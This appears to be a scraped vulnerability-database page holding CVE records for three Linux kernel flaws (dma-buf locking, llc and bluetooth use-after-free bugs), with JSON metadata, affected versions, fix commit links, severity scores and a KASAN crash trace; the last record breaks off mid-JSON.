|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: a6aa8fca4d792c72947e341d7842d2f700534335 Version: a6aa8fca4d792c72947e341d7842d2f700534335 Version: a6aa8fca4d792c72947e341d7842d2f700534335 Version: a6aa8fca4d792c72947e341d7842d2f700534335 Version: a6aa8fca4d792c72947e341d7842d2f700534335 Version: a6aa8fca4d792c72947e341d7842d2f700534335 Version: a6aa8fca4d792c72947e341d7842d2f700534335 Version: a6aa8fca4d792c72947e341d7842d2f700534335 Version: f14ad42b8743897d140808467ed4ae3ce93bd0a5 |
||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2025-11-04T17:21:57.330Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/1ff116f68560a25656933d5a18e7619cb6773d8a"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/165b25e3ee9333f7b04f8db43895beacb51582ed"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/ae6fc4e6a3322f6d1c8ff59150d8469487a73dd8"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/9d75fab2c14a25553a1664586ed122c316bd1878"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/242b30466879e6defa521573c27e12018276c33a"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/a4ee78244445ab73af22bfc5a5fc543963b25aef"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/8a283cdfc8beeb14024387a925247b563d614e1e"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/b794918961516f667b0c745aebdfebbb8a98df39"
},
{
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-38780",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T17:08:56.155586Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-11T17:34:44.243Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/dma-buf/sync_debug.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "1ff116f68560a25656933d5a18e7619cb6773d8a",
"status": "affected",
"version": "a6aa8fca4d792c72947e341d7842d2f700534335",
"versionType": "git"
},
{
"lessThan": "165b25e3ee9333f7b04f8db43895beacb51582ed",
"status": "affected",
"version": "a6aa8fca4d792c72947e341d7842d2f700534335",
"versionType": "git"
},
{
"lessThan": "ae6fc4e6a3322f6d1c8ff59150d8469487a73dd8",
"status": "affected",
"version": "a6aa8fca4d792c72947e341d7842d2f700534335",
"versionType": "git"
},
{
"lessThan": "9d75fab2c14a25553a1664586ed122c316bd1878",
"status": "affected",
"version": "a6aa8fca4d792c72947e341d7842d2f700534335",
"versionType": "git"
},
{
"lessThan": "242b30466879e6defa521573c27e12018276c33a",
"status": "affected",
"version": "a6aa8fca4d792c72947e341d7842d2f700534335",
"versionType": "git"
},
{
"lessThan": "a4ee78244445ab73af22bfc5a5fc543963b25aef",
"status": "affected",
"version": "a6aa8fca4d792c72947e341d7842d2f700534335",
"versionType": "git"
},
{
"lessThan": "8a283cdfc8beeb14024387a925247b563d614e1e",
"status": "affected",
"version": "a6aa8fca4d792c72947e341d7842d2f700534335",
"versionType": "git"
},
{
"lessThan": "b794918961516f667b0c745aebdfebbb8a98df39",
"status": "affected",
"version": "a6aa8fca4d792c72947e341d7842d2f700534335",
"versionType": "git"
},
{
"status": "affected",
"version": "f14ad42b8743897d140808467ed4ae3ce93bd0a5",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/dma-buf/sync_debug.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "4.14"
},
{
"lessThan": "4.14",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.316",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.278",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.219",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.161",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.93",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.33",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.9.*",
"status": "unaffected",
"version": "6.9.4",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.10",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.316",
"versionStartIncluding": "4.14",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.278",
"versionStartIncluding": "4.14",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.219",
"versionStartIncluding": "4.14",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.161",
"versionStartIncluding": "4.14",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.93",
"versionStartIncluding": "4.14",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.33",
"versionStartIncluding": "4.14",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9.4",
"versionStartIncluding": "4.14",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.10",
"versionStartIncluding": "4.14",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionStartIncluding": "4.9.68",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\ndma-buf/sw-sync: don\u0027t enable IRQ from sync_print_obj()\n\nSince commit a6aa8fca4d79 (\"dma-buf/sw-sync: Reduce irqsave/irqrestore from\nknown context\") by error replaced spin_unlock_irqrestore() with\nspin_unlock_irq() for both sync_debugfs_show() and sync_print_obj() despite\nsync_print_obj() is called from sync_debugfs_show(), lockdep complains\ninconsistent lock state warning.\n\nUse plain spin_{lock,unlock}() for sync_print_obj(), for\nsync_debugfs_show() is already using spin_{lock,unlock}_irq()."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T12:56:57.687Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/1ff116f68560a25656933d5a18e7619cb6773d8a"
},
{
"url": "https://git.kernel.org/stable/c/165b25e3ee9333f7b04f8db43895beacb51582ed"
},
{
"url": "https://git.kernel.org/stable/c/ae6fc4e6a3322f6d1c8ff59150d8469487a73dd8"
},
{
"url": "https://git.kernel.org/stable/c/9d75fab2c14a25553a1664586ed122c316bd1878"
},
{
"url": "https://git.kernel.org/stable/c/242b30466879e6defa521573c27e12018276c33a"
},
{
"url": "https://git.kernel.org/stable/c/a4ee78244445ab73af22bfc5a5fc543963b25aef"
},
{
"url": "https://git.kernel.org/stable/c/8a283cdfc8beeb14024387a925247b563d614e1e"
},
{
"url": "https://git.kernel.org/stable/c/b794918961516f667b0c745aebdfebbb8a98df39"
}
],
"title": "dma-buf/sw-sync: don\u0027t enable IRQ from sync_print_obj()",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-38780",
"datePublished": "2024-06-21T11:15:12.892Z",
"dateReserved": "2024-06-21T10:12:11.516Z",
"dateUpdated": "2025-11-04T17:21:57.330Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2024-26625 (GCVE-0-2024-26625)
Vulnerability from cvelistv5
Published
2024-03-06 06:45
Modified
2025-05-04 08:52
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
llc: call sock_orphan() at release time
syzbot reported an interesting trace [1] caused by a stale sk->sk_wq
pointer in a closed llc socket.
In commit ff7b11aa481f ("net: socket: set sock->sk to NULL after
calling proto_ops::release()") Eric Biggers hinted that some protocols
are missing a sock_orphan(), we need to perform a full audit.
In net-next, I plan to clear sock->sk from sock_orphan() and
amend Eric patch to add a warning.
[1]
BUG: KASAN: slab-use-after-free in list_empty include/linux/list.h:373 [inline]
BUG: KASAN: slab-use-after-free in waitqueue_active include/linux/wait.h:127 [inline]
BUG: KASAN: slab-use-after-free in sock_def_write_space_wfree net/core/sock.c:3384 [inline]
BUG: KASAN: slab-use-after-free in sock_wfree+0x9a8/0x9d0 net/core/sock.c:2468
Read of size 8 at addr ffff88802f4fc880 by task ksoftirqd/1/27
CPU: 1 PID: 27 Comm: ksoftirqd/1 Not tainted 6.8.0-rc1-syzkaller-00049-g6098d87eaf31 #0
Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.16.2-debian-1.16.2-1 04/01/2014
Call Trace:
<TASK>
__dump_stack lib/dump_stack.c:88 [inline]
dump_stack_lvl+0xd9/0x1b0 lib/dump_stack.c:106
print_address_description mm/kasan/report.c:377 [inline]
print_report+0xc4/0x620 mm/kasan/report.c:488
kasan_report+0xda/0x110 mm/kasan/report.c:601
list_empty include/linux/list.h:373 [inline]
waitqueue_active include/linux/wait.h:127 [inline]
sock_def_write_space_wfree net/core/sock.c:3384 [inline]
sock_wfree+0x9a8/0x9d0 net/core/sock.c:2468
skb_release_head_state+0xa3/0x2b0 net/core/skbuff.c:1080
skb_release_all net/core/skbuff.c:1092 [inline]
napi_consume_skb+0x119/0x2b0 net/core/skbuff.c:1404
e1000_unmap_and_free_tx_resource+0x144/0x200 drivers/net/ethernet/intel/e1000/e1000_main.c:1970
e1000_clean_tx_irq drivers/net/ethernet/intel/e1000/e1000_main.c:3860 [inline]
e1000_clean+0x4a1/0x26e0 drivers/net/ethernet/intel/e1000/e1000_main.c:3801
__napi_poll.constprop.0+0xb4/0x540 net/core/dev.c:6576
napi_poll net/core/dev.c:6645 [inline]
net_rx_action+0x956/0xe90 net/core/dev.c:6778
__do_softirq+0x21a/0x8de kernel/softirq.c:553
run_ksoftirqd kernel/softirq.c:921 [inline]
run_ksoftirqd+0x31/0x60 kernel/softirq.c:913
smpboot_thread_fn+0x660/0xa10 kernel/smpboot.c:164
kthread+0x2c6/0x3a0 kernel/kthread.c:388
ret_from_fork+0x45/0x80 arch/x86/kernel/process.c:147
ret_from_fork_asm+0x11/0x20 arch/x86/entry/entry_64.S:242
</TASK>
Allocated by task 5167:
kasan_save_stack+0x33/0x50 mm/kasan/common.c:47
kasan_save_track+0x14/0x30 mm/kasan/common.c:68
unpoison_slab_object mm/kasan/common.c:314 [inline]
__kasan_slab_alloc+0x81/0x90 mm/kasan/common.c:340
kasan_slab_alloc include/linux/kasan.h:201 [inline]
slab_post_alloc_hook mm/slub.c:3813 [inline]
slab_alloc_node mm/slub.c:3860 [inline]
kmem_cache_alloc_lru+0x142/0x6f0 mm/slub.c:3879
alloc_inode_sb include/linux/fs.h:3019 [inline]
sock_alloc_inode+0x25/0x1c0 net/socket.c:308
alloc_inode+0x5d/0x220 fs/inode.c:260
new_inode_pseudo+0x16/0x80 fs/inode.c:1005
sock_alloc+0x40/0x270 net/socket.c:634
__sock_create+0xbc/0x800 net/socket.c:1535
sock_create net/socket.c:1622 [inline]
__sys_socket_create net/socket.c:1659 [inline]
__sys_socket+0x14c/0x260 net/socket.c:1706
__do_sys_socket net/socket.c:1720 [inline]
__se_sys_socket net/socket.c:1718 [inline]
__x64_sys_socket+0x72/0xb0 net/socket.c:1718
do_syscall_x64 arch/x86/entry/common.c:52 [inline]
do_syscall_64+0xd3/0x250 arch/x86/entry/common.c:83
entry_SYSCALL_64_after_hwframe+0x63/0x6b
Freed by task 0:
kasan_save_stack+0x33/0x50 mm/kasan/common.c:47
kasan_save_track+0x14/0x30 mm/kasan/common.c:68
kasan_save_free_info+0x3f/0x60 mm/kasan/generic.c:640
poison_slab_object mm/kasan/common.c:241 [inline]
__kasan_slab_free+0x121/0x1b0 mm/kasan/common.c:257
kasan_slab_free include/linux/kasan.h:184 [inline]
slab_free_hook mm/slub.c:2121 [inlin
---truncated---
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 43815482370c510c569fd18edb57afcb0fa8cab6 Version: 43815482370c510c569fd18edb57afcb0fa8cab6 Version: 43815482370c510c569fd18edb57afcb0fa8cab6 Version: 43815482370c510c569fd18edb57afcb0fa8cab6 Version: 43815482370c510c569fd18edb57afcb0fa8cab6 Version: 43815482370c510c569fd18edb57afcb0fa8cab6 Version: 43815482370c510c569fd18edb57afcb0fa8cab6 Version: 43815482370c510c569fd18edb57afcb0fa8cab6 |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-26625",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-03-06T16:41:05.994976Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-06-04T17:48:16.391Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T00:07:19.761Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/6b950c712a9a05cdda4aea7fcb2848766576c11b"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/64babb17e8150771c58575d8f93a35c5296b499f"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/d0b5b1f12429df3cd9751ab8b2f53729b77733b7"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/dbc1b89981f9c5360277071d33d7f04a43ffda4a"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/9c333d9891f34cea8af1b229dc754552304c8eee"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/3151051b787f7cd7e3329ea0016eb9113c248812"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/8e51f084b5716653f19e291ed5f026791d4b3ed4"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/aa2b2eb3934859904c287bf5434647ba72e14c1c"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"net/llc/af_llc.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "6b950c712a9a05cdda4aea7fcb2848766576c11b",
"status": "affected",
"version": "43815482370c510c569fd18edb57afcb0fa8cab6",
"versionType": "git"
},
{
"lessThan": "64babb17e8150771c58575d8f93a35c5296b499f",
"status": "affected",
"version": "43815482370c510c569fd18edb57afcb0fa8cab6",
"versionType": "git"
},
{
"lessThan": "d0b5b1f12429df3cd9751ab8b2f53729b77733b7",
"status": "affected",
"version": "43815482370c510c569fd18edb57afcb0fa8cab6",
"versionType": "git"
},
{
"lessThan": "dbc1b89981f9c5360277071d33d7f04a43ffda4a",
"status": "affected",
"version": "43815482370c510c569fd18edb57afcb0fa8cab6",
"versionType": "git"
},
{
"lessThan": "9c333d9891f34cea8af1b229dc754552304c8eee",
"status": "affected",
"version": "43815482370c510c569fd18edb57afcb0fa8cab6",
"versionType": "git"
},
{
"lessThan": "3151051b787f7cd7e3329ea0016eb9113c248812",
"status": "affected",
"version": "43815482370c510c569fd18edb57afcb0fa8cab6",
"versionType": "git"
},
{
"lessThan": "8e51f084b5716653f19e291ed5f026791d4b3ed4",
"status": "affected",
"version": "43815482370c510c569fd18edb57afcb0fa8cab6",
"versionType": "git"
},
{
"lessThan": "aa2b2eb3934859904c287bf5434647ba72e14c1c",
"status": "affected",
"version": "43815482370c510c569fd18edb57afcb0fa8cab6",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"net/llc/af_llc.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "2.6.35"
},
{
"lessThan": "2.6.35",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.307",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.269",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.210",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.149",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.77",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.16",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.4",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.8",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.307",
"versionStartIncluding": "2.6.35",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.269",
"versionStartIncluding": "2.6.35",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.210",
"versionStartIncluding": "2.6.35",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.149",
"versionStartIncluding": "2.6.35",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.77",
"versionStartIncluding": "2.6.35",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.16",
"versionStartIncluding": "2.6.35",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.4",
"versionStartIncluding": "2.6.35",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8",
"versionStartIncluding": "2.6.35",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nllc: call sock_orphan() at release time\n\nsyzbot reported an interesting trace [1] caused by a stale sk-\u003esk_wq\npointer in a closed llc socket.\n\nIn commit ff7b11aa481f (\"net: socket: set sock-\u003esk to NULL after\ncalling proto_ops::release()\") Eric Biggers hinted that some protocols\nare missing a sock_orphan(), we need to perform a full audit.\n\nIn net-next, I plan to clear sock-\u003esk from sock_orphan() and\namend Eric patch to add a warning.\n\n[1]\n BUG: KASAN: slab-use-after-free in list_empty include/linux/list.h:373 [inline]\n BUG: KASAN: slab-use-after-free in waitqueue_active include/linux/wait.h:127 [inline]\n BUG: KASAN: slab-use-after-free in sock_def_write_space_wfree net/core/sock.c:3384 [inline]\n BUG: KASAN: slab-use-after-free in sock_wfree+0x9a8/0x9d0 net/core/sock.c:2468\nRead of size 8 at addr ffff88802f4fc880 by task ksoftirqd/1/27\n\nCPU: 1 PID: 27 Comm: ksoftirqd/1 Not tainted 6.8.0-rc1-syzkaller-00049-g6098d87eaf31 #0\nHardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.16.2-debian-1.16.2-1 04/01/2014\nCall Trace:\n \u003cTASK\u003e\n __dump_stack lib/dump_stack.c:88 [inline]\n dump_stack_lvl+0xd9/0x1b0 lib/dump_stack.c:106\n print_address_description mm/kasan/report.c:377 [inline]\n print_report+0xc4/0x620 mm/kasan/report.c:488\n kasan_report+0xda/0x110 mm/kasan/report.c:601\n list_empty include/linux/list.h:373 [inline]\n waitqueue_active include/linux/wait.h:127 [inline]\n sock_def_write_space_wfree net/core/sock.c:3384 [inline]\n sock_wfree+0x9a8/0x9d0 net/core/sock.c:2468\n skb_release_head_state+0xa3/0x2b0 net/core/skbuff.c:1080\n skb_release_all net/core/skbuff.c:1092 [inline]\n napi_consume_skb+0x119/0x2b0 net/core/skbuff.c:1404\n e1000_unmap_and_free_tx_resource+0x144/0x200 drivers/net/ethernet/intel/e1000/e1000_main.c:1970\n e1000_clean_tx_irq drivers/net/ethernet/intel/e1000/e1000_main.c:3860 [inline]\n e1000_clean+0x4a1/0x26e0 drivers/net/ethernet/intel/e1000/e1000_main.c:3801\n __napi_poll.constprop.0+0xb4/0x540 net/core/dev.c:6576\n napi_poll net/core/dev.c:6645 [inline]\n net_rx_action+0x956/0xe90 net/core/dev.c:6778\n __do_softirq+0x21a/0x8de kernel/softirq.c:553\n run_ksoftirqd kernel/softirq.c:921 [inline]\n run_ksoftirqd+0x31/0x60 kernel/softirq.c:913\n smpboot_thread_fn+0x660/0xa10 kernel/smpboot.c:164\n kthread+0x2c6/0x3a0 kernel/kthread.c:388\n ret_from_fork+0x45/0x80 arch/x86/kernel/process.c:147\n ret_from_fork_asm+0x11/0x20 arch/x86/entry/entry_64.S:242\n \u003c/TASK\u003e\n\nAllocated by task 5167:\n kasan_save_stack+0x33/0x50 mm/kasan/common.c:47\n kasan_save_track+0x14/0x30 mm/kasan/common.c:68\n unpoison_slab_object mm/kasan/common.c:314 [inline]\n __kasan_slab_alloc+0x81/0x90 mm/kasan/common.c:340\n kasan_slab_alloc include/linux/kasan.h:201 [inline]\n slab_post_alloc_hook mm/slub.c:3813 [inline]\n slab_alloc_node mm/slub.c:3860 [inline]\n kmem_cache_alloc_lru+0x142/0x6f0 mm/slub.c:3879\n alloc_inode_sb include/linux/fs.h:3019 [inline]\n sock_alloc_inode+0x25/0x1c0 net/socket.c:308\n alloc_inode+0x5d/0x220 fs/inode.c:260\n new_inode_pseudo+0x16/0x80 fs/inode.c:1005\n sock_alloc+0x40/0x270 net/socket.c:634\n __sock_create+0xbc/0x800 net/socket.c:1535\n sock_create net/socket.c:1622 [inline]\n __sys_socket_create net/socket.c:1659 [inline]\n __sys_socket+0x14c/0x260 net/socket.c:1706\n __do_sys_socket net/socket.c:1720 [inline]\n __se_sys_socket net/socket.c:1718 [inline]\n __x64_sys_socket+0x72/0xb0 net/socket.c:1718\n do_syscall_x64 arch/x86/entry/common.c:52 [inline]\n do_syscall_64+0xd3/0x250 arch/x86/entry/common.c:83\n entry_SYSCALL_64_after_hwframe+0x63/0x6b\n\nFreed by task 0:\n kasan_save_stack+0x33/0x50 mm/kasan/common.c:47\n kasan_save_track+0x14/0x30 mm/kasan/common.c:68\n kasan_save_free_info+0x3f/0x60 mm/kasan/generic.c:640\n poison_slab_object mm/kasan/common.c:241 [inline]\n __kasan_slab_free+0x121/0x1b0 mm/kasan/common.c:257\n kasan_slab_free include/linux/kasan.h:184 [inline]\n slab_free_hook mm/slub.c:2121 [inlin\n---truncated---"
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T08:52:34.411Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/6b950c712a9a05cdda4aea7fcb2848766576c11b"
},
{
"url": "https://git.kernel.org/stable/c/64babb17e8150771c58575d8f93a35c5296b499f"
},
{
"url": "https://git.kernel.org/stable/c/d0b5b1f12429df3cd9751ab8b2f53729b77733b7"
},
{
"url": "https://git.kernel.org/stable/c/dbc1b89981f9c5360277071d33d7f04a43ffda4a"
},
{
"url": "https://git.kernel.org/stable/c/9c333d9891f34cea8af1b229dc754552304c8eee"
},
{
"url": "https://git.kernel.org/stable/c/3151051b787f7cd7e3329ea0016eb9113c248812"
},
{
"url": "https://git.kernel.org/stable/c/8e51f084b5716653f19e291ed5f026791d4b3ed4"
},
{
"url": "https://git.kernel.org/stable/c/aa2b2eb3934859904c287bf5434647ba72e14c1c"
}
],
"title": "llc: call sock_orphan() at release time",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-26625",
"datePublished": "2024-03-06T06:45:33.311Z",
"dateReserved": "2024-02-19T14:20:24.135Z",
"dateUpdated": "2025-05-04T08:52:34.411Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2023-51779 (GCVE-0-2023-51779)
Vulnerability from cvelistv5
Published
2023-12-25 00:00
Modified
2024-08-29 18:54
Severity ?
VLAI Severity ?
EPSS score ?
CWE
- n/a
Summary
bt_sock_recvmsg in net/bluetooth/af_bluetooth.c in the Linux kernel through 6.6.8 has a use-after-free because of a bt_sock_ioctl race condition.
References
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T22:48:11.289Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://github.com/torvalds/linux/commit/2e07e8348ea454615e268222ae3fc240421be768"
},
{
"name": "[debian-lts-announce] 20240625 [SECURITY] [DLA 3841-1] linux-5.10 security update",
"tags": [
"mailing-list",
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00016.html"
}
],
"title": "CVE Program Container"
},
{
"affected": [
{
"cpes": [
"cpe:2.3:o:linux:kernel:*:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "kernel",
"vendor": "linux",
"versions": [
{
"lessThan": "6.6.8",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "HIGH",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
}
},
{
"other": {
"content": {
"id": "CVE-2023-51779",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "total"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-03-05T17:06:18.646179Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-416",
"description": "CWE-416 Use After Free",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2024-08-29T18:54:00.210Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"descriptions": [
{
"lang": "en",
